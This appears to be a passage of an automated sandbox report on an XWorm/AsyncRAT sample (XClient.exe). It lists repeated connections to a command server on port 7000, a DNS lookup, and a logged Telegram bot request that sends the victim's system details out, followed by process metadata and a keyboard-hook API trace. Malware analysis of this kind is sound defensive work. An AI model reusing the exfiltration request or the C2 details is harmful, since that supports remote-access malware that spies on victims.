                                              Dec 30, 2024 20:14:54.610388994 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.637753010 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.642868996 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.701586962 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.706429005 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:55.947626114 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:55.951387882 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.701316118 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.705549002 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.706357002 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:59.710433006 CET700049733144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:59.717353106 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.729456902 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.734333038 CET700049733144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:59.749315023 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.754249096 CET700049733144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:01.277767897 CET700049733144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:01.283272028 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:04.754534006 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:04.756056070 CET497347000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:04.759376049 CET700049733144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:04.760876894 CET700049734144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:04.760971069 CET497347000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:04.775459051 CET497347000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:04.780304909 CET700049734144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:06.324250937 CET700049734144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:06.324326992 CET497347000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:09.789855003 CET497347000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:09.789856911 CET497357000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:09.794779062 CET700049734144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:09.794790030 CET700049735144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:09.799309015 CET497357000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:09.811309099 CET497357000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:09.816163063 CET700049735144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:11.354947090 CET700049735144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:11.361931086 CET497357000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:14.821580887 CET497357000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:14.823112965 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:14.969042063 CET700049735144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:14.969059944 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:14.969175100 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:14.985213995 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:14.991628885 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:15.029675007 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:15.034519911 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:15.061642885 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:15.066468000 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:15.077652931 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:15.082454920 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:15.955323935 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:15.960150957 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:16.526101112 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:16.526164055 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:20.099337101 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:20.099363089 CET497377000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:20.104255915 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:20.104266882 CET700049737144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:20.111362934 CET497377000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:20.123908997 CET497377000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:20.128726959 CET700049737144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:21.668632984 CET700049737144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:21.673516989 CET497377000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.129623890 CET497377000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.131107092 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.134476900 CET700049737144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:25.135905981 CET700049738144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:25.135967970 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.156759977 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.161626101 CET700049738144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:25.177671909 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.182472944 CET700049738144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:26.696139097 CET700049738144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:26.696197987 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.211347103 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.215353966 CET497397000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.216267109 CET700049738144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:30.220163107 CET700049739144.48.105.119192.168.2.16
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Dec 30, 2024 20:13:40.791917086 CET | 49895 | 53 | 192.168.2.16 | 1.1.1.1
                                              Dec 30, 2024 20:13:40.799556017 CET | 53 | 49895 | 1.1.1.1 | 192.168.2.16
                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                              Dec 30, 2024 20:13:40.791917086 CET | 192.168.2.16 | 1.1.1.1 | 0x5a35 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Dec 30, 2024 20:13:40.799556017 CET | 1.1.1.1 | 192.168.2.16 | 0x5a35 | No error (0) | api.telegram.org | (none) | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                              • api.telegram.org
                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.16 | 49702 | 149.154.167.220 | 443 | 6524 | C:\Users\user\Desktop\XClient.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-12-30 19:13:41 UTC | 409 | OUT | GET /botYour_Token/sendMessage?chat_id=6170564111&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A7711B137F8E174C9CF15%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ZLSGWO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-12-30 19:13:41 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Mon, 30 Dec 2024 19:13:41 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-12-30 19:13:41 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



                                              Target ID:0
                                              Start time:14:13:36
                                              Start date:30/12/2024
                                              Path:C:\Users\user\Desktop\XClient.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\XClient.exe"
                                              Imagebase:0x9b0000
                                              File size:40'960 bytes
                                              MD5 hash:CA1B3F03551F41B8C83217C3AF2B0D3C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:false

                                              Target ID:12
                                              Start time:14:15:24
                                              Start date:30/12/2024
                                              Path:C:\Users\user\Desktop\XClient.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\XClient.exe"
                                              Imagebase:0x170000
                                              File size:40'960 bytes
                                              MD5 hash:CA1B3F03551F41B8C83217C3AF2B0D3C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                                Execution Graph

                                                Execution Coverage:17.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:3
                                                Total number of Limit Nodes:0
                                                execution_graph
                                                Node 2762: 7ffec82a21f6
                                                Node 2763: 7ffec82a220f (SetWindowsHookExW)
                                                Node 2765: 7ffec82a22c1
                                                Edges: 2762 -> 2763, 2763 -> 2765

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2407424835.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: 70ac6a0d60f9ff9463b7a7299668722f18133e27fe383cf11fdb30e5ad78af0d
                                                • Instruction ID: aee2b48705442fe15763950a0437f529607adc4010703943134af3f56ff07ace
                                                • Opcode Fuzzy Hash: 70ac6a0d60f9ff9463b7a7299668722f18133e27fe383cf11fdb30e5ad78af0d
                                                • Instruction Fuzzy Hash: BA31D53191CA4D8FDB58DF5C98456F9BBE1EB99321F04427FE00DD3252CA64A816CBC1
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd